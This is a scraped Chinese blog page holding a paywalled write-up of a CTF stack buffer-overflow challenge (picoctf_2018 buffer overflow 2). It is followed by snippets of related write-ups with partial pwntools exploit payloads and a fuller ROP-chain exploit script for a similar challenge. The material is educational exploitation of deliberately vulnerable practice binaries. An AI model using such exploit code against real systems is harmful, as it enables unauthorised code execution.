[BUUCTF]PWN——picoctf_2018_buffer overflow 2

最新推荐文章于 2024-04-14 16:08:24 发布
原创 最新推荐文章于 2024-04-14 16:08:24 发布 · 744 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

博客内容涉及了一次PicoCTF比赛中的缓冲区溢出漏洞利用挑战。作者使用了32位系统,并启用了NX保护。通过IDA分析,找到了win函数的地址0x80485cb。当输入满足a1等于0xDEADBEEF且a2等于0xDEADC0DE时,程序会输出flag。作者构造了一个payload并使用Python的pwn库远程发送,以尝试获取flag。

picoctf_2018_buffer overflow 2

例行检查,32位,开启NX保护
在这里插入图片描述
运行一下,
在这里插入图片描述
用IDA打开。看到了flag.txt,跟进一下。
在这里插入图片描述
win函数地址为0x80485cb
在这里插入图片描述

a1 == 0xDEADBEEF && a2 == 0xDEADC0DE 时,输出flag.

在这里插入图片描述

from pwn import*
r=remote
最低0.47元/天 解锁文章
BUUCTFPicoCTF_2018_buffer_overflow_2
weixin_51055545的博客
01-05 1011
例行检查程序: 还是32位程序,没有canary,很可能是溢出类的。 放到IDA中: 主函数没什么特别,进入vuln()函数看一下: 果然存在溢出漏洞,两次溢出,直接去get shell 第一次溢出去泄露libc地址,第二次溢出get shell 这里我选怎printf()函数作为泄露的函数,同样也可以选择puts()函数, 构造payload : io.recvuntil(':') payload = 'A'*0x6c payload += p32(0) payload += p32(
PicoCTF_2018_buffer_overflow_2
m0sway的博客
11-29 453
PicoCTF_2018_buffer_overflow_2 使用checksec查看: 开启了栈不可执行,放进IDA中查看,其实和PicoCTF_2018_buffer_overflow_1没啥变化 唯一做了变动的是win()函数: 上一题是直接跳到这个函数就能读取到flag,这题需要给win()函数两个参数a1、a2 a1需要等于0xDEADBEEF a2需要等于0xDEADC0DE 才能读取到flag。 那么直接传参即可,秒了。 exp: from pwn import * #start r
BugkuCTF:overflow2[WriteUP]
如有错误感谢斧正
04-14 1146
我们需要构造payload使buf数组溢出,然后接上这里的total总的合成地址即可实现shell交互。总共需要填充28个字节,后面溢出可以填充为成0x20+0x8,或者直接写成0x28。总链:total = 0x40126b + 0x402004 + 0x401050。存在/bin/sh意味着我们可以利用这个字符串启动shell,双击查看地址。先看到_system函数,此函数可以直接返回一个由实参当作命令的消息。再查看下方的地址信息,获取到该函数十六进制地址为:0x401050。查看一下flag文件。
[BUUCTF-pwn]——picoctf_2018_buffer overflow 2
Y_peak的博客
03-17 528
[BUUCTF-pwn]——picoctf_2018_buffer overflow 2 简单的栈溢出,不过需要将参数自己设置而已 注意负数如何转换为补码, 不知道也可以直接在汇编里面找 from pwn import * p = remote('node3.buuoj.cn',28931) a1 = 0xdeadbeef a2 = 0xdeadc0de payload = 'a' * (0x6c + 4) + p32(0x080485CB) + p32(0)+ p32(a1) + p32(a2) p.re
BUUCTF picoctf_2018_buffer overflow 2
qq_51821131的博客
10-05 1491
picoctf_2018_buffer overflow 2 检查保护,且为32位 明显栈溢出 找到win函数可以打印flag 整合思路,栈溢出,向win函数传入参数并满足条件即可 from pwn import * p=remote('node4.buuoj.cn',25086) #context.terminal = ['tmux', 'splitw', '-h'] elf=ELF('./PicoCTF_2018_buffer_overflow_2') win=0x080485CB a1=0xDE
[BUUCTF-pwn]——picoctf_2018_buffer overflow 0
Y_peak的博客
04-28 544
[BUUCTF-pwn]——picoctf_2018_buffer overflow 0 好久不写BUU了,手都快生了赶快过来写写。 通过观察源文件发现,首先有put函数不需要去libc中找,同时argv肯定大于1,也就是需要至少两个参数,才可以到else语句,同时vuln函数的参数是第二个参数。 进入vuln函数内部看看,找到strcpy函数这个函数是一个典型的可以用来利用溢出的函数。所以我们可以在这里进行栈溢出,以此调用puts函数打印flag.因为flag在bss段上。 from pwn imp
[BUUCTF]PWN——picoctf_2018_buffer overflow 1
BangSen1的博客
03-20 477
picoctf_2018_buffer overflow 1 例行检查,32位,没开启保护 运行一下 用IDA打开,检索字符串,看到了flag.txt,跟进找到了调用flag.txt的函数 win_addr=0x80485CB gets函数读入,存在溢出漏洞,覆盖ret为win函数即可 from pwn import* r=remote('node3.buuoj.cn',26185) win_addr=0x80485CB payload='a'*(0x28+4)+p32(win_addr)
BUUCTFPicoCTF_2018_buffer_overflow_1
weixin_51055545的博客
01-05 1464
先放进虚拟机中检查: 任何保护机制都没开,放到32位IDA中: 主函数很简单,进入vuln()函数看一下: 很明显有溢出,进入栈中看偏移: 这里偏移为0x28,我们思路是第一次溢出,去泄露libc地址,再次进行溢出get shell。 第一次溢出: io.recvuntil(':') payload = 'A'*0X28 payload += p32(0) payload += p32(printf) payload += p32(main) payload += p32(elf.got.
BUUCTF pwn——PicoCTF_2018_buffer_overflow 1
CNS-Enterprise BCC-1701-J
05-13 179
BUUCTF 做题练习
BUUCTF pwn——picoctf_2018_buffer overflow 2
CNS-Enterprise BCC-1701-J
05-20 209
BUUCTF 做题练习
picoctf_2018_buffer_overflow_2
z1r0的博客
12-11 253
picoctf_2018_buffer_overflow_2 查看保护 有溢出,还有一个getflag函数,但是想要利用需要给两个参数,结合32位下的系统调用规则即可get flag from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27317) else:
picoctf_2018_buffer overflow 2
个人笔记
05-05 148
参数a1=0xDEADBEEF+参数a2=0xDEADC0DE。
PicoCTF_2018_buffer_overflow_2详细wp
m0_46204503的博客
11-12 3232
PicoCTF_2018_buffer_overflow_2 知识点 函数调用栈机制(栈溢出) 栈传参 32位程序栈传参,以逆序传入参数,即最后一个参数在最高地址 64位程序前6个参数是寄存器传参,前6个参数分别存在rdi、rsi、rdx、rcx、r8、r9 little trick 如何将一个数转化成底层的二进制的机器码 手算 网上找在线工具,这里不做介绍 在IDA中看汇编代码 因为c代码都可以当做一组汇编指令,比如从上述的0x804861D开始到0x804862D四句汇编指令
picoctf_2018_buffer overflow 2&&wustctf2020_getshell&&[BJDCTF 2nd]snake_dyn&&ciscn_2019_es_7[rsop]
、moddemod
07-22 609
picoctf_2018_buffer overflow 2 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_2' p = process(proc_name) p = remote('node3.buuoj.cn', 28375) elf =
BugkuCTF pwn overflow2
ChaoYue_miku的博客
07-04 1790
** 0、尝试打开文件,使用checksec检查保护情况 ** ** 1、使用IDA 64 Pro打开文件 ** read()函数存在栈溢出,查看栈结构 ** 2、构造rop链 ** Shitf+F12查找字符串 发现/bin/sh的地址是0x402004 system函数的地址是0x401050 64位程序的第一个参数在 rdi 寄存器里 使用ROPgadget工具寻找汇编指令 rdi寄存器地址:0x40126b ** 3、构造exp ** from pwn import * r = remo
[BUUCTF]PWN——picoctf_2018_buffer overflow 1/2
mcmuyanga的博客
11-07 557
picoctf_2018_buffer overflow 1 附件 步骤: 例行检查,32位程序,没开保护 本地运行一下程序,看看程序大概的执行情况 32位ida载入,习惯性的检查程序里的字符串,发现有flag.txt,跟进,找到了读出flag的函数,win_addr=0x80485CB 根据运行时看到的字符串找到了输入点 gets函数读入,存在溢出漏洞,覆盖ret为win函数即可 from pwn import * r=remote('node3.buuoj.cn',27200) win_a
BugkuCTF-PWNpwn5-overflow2超详细讲解
am_03的博客
08-31 2140
知识点 setvbuf: setvbuf函数的功能: 如果你的内存足够大,可以把文件IO的BUF设置大一些,这样每次你用 fopen/fread/fwrite/fscanf/fprintf语句的时候,都会在内存里操作,减少内存到磁盘IO读写的操作次数,提高系统效率。 如果你的程序的功能涉及到类似数据库、视频、音频、图像处理等大量需要爆发式磁盘到内存的IO情况下,可以考虑setvbuf进行优化内存IO。 功 能: 把缓区与流相关 解题流程 查看保护机制 发现开启了RELRO,NX 只能通过ROP绕过 IDA
picoctf_2018_rop chain 1这是什么原理
最新发布
07-20
### 栈溢出与ROP链的基本原理 在`picoCTF_2018_rop_chain`题目中,漏洞函数`vuln()`中使用了`gets()`函数,导致了缓冲区溢出问题。攻击者可以通过精心构造的输入覆盖栈上的返回地址,从而控制程序流。由于开启了NX保护,无法直接执行shellcode,因此需要使用ROP(Return Oriented Programming)技术来绕过保护机制。 ### win_function1和win_function2的作用 题目中的`win_function1()`和`win_function2(int a1)`函数用于设置两个全局变量`win1`和`win2`的值。只有当这两个变量都被设置为1,并且传递给`flag()`函数的参数`a1`等于`0xDEADBAAD`(即-559039827),才能触发打印flag的操作。具体来说: - `win_function1()`将`win1`设置为1。 - `win_function2(int a1)`只有在`win1`为1且传入的参数`a1`等于`0xBAAAAAAD`(即-1163220307)时,才会将`win2`设置为1[^1]。 ### 构造ROP链的过程 为了满足上述条件,攻击者需要构造一个ROP链,依次调用`win_function1`、`win_function2`和`flag`函数,并正确传递参数。具体步骤如下: 1. **填充缓冲区**:首先需要填充足够的字节(例如`0x18`字节)以覆盖缓冲区,直到覆盖到返回地址的位置。 2. **调用win_function1**:由于`win_function1`不需要参数,因此直接调用即可。此时`win1`被设置为1。 3. **调用win_function2**:为了使`win2`被设置为1,需要在调用`win_function2`时传递参数`0xBAAAAAAD`。 4. **调用flag函数**:最后调用`flag`函数,并传递参数`0xDEADBAAD`,以满足条件并打印flag[^3]。 ### 示例代码 以下是构造payload的具体Python代码示例,使用了`pwntools`库来简化ROP链的构造过程: ```python from pwn import * # 连接到目标服务 io = process("./PicoCTF_2018_rop_chain") elf = ELF('./PicoCTF_2018_rop_chain') # 获取函数地址 win1_addr = elf.symbols['win_function1'] win2_addr = elf.symbols['win_function2'] flag_addr = elf.symbols['flag'] # 构造payload payload = b'a' * (0x18 + 4) # 填充缓冲区 payload += p32(win1_addr) # 调用win_function1 payload += p32(win2_addr) # 调用win_function2 payload += p32(flag_addr) # 调用flag函数 payload += p32(0xBAAAAAAD) # win_function2的参数 payload += p32(0xDEADBAAD) # flag函数的参数 # 发送payload io.sendlineafter("Enter your input> ", payload) io.interactive() ``` ### 栈帧结构的构造 在构造ROP链时,需要特别注意栈帧结构的布局。每个函数调用后,返回地址会被压入栈中。因此,需要确保每个函数调用后的返回地址指向下一个函数的入口,并且参数正确传递。具体来说: - `win_function1`的调用不需要参数,因此只需在其后放置`win_function2`的地址。 - `win_function2`需要一个参数`0xBAAAAAAD`,因此在其后放置该参数。 - `flag`函数需要一个参数`0xDEADBAAD`,因此在其后放置该参数[^4]。 通过这种方式,可以逐步构建出满足条件的ROP链,最终触发flag的打印。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值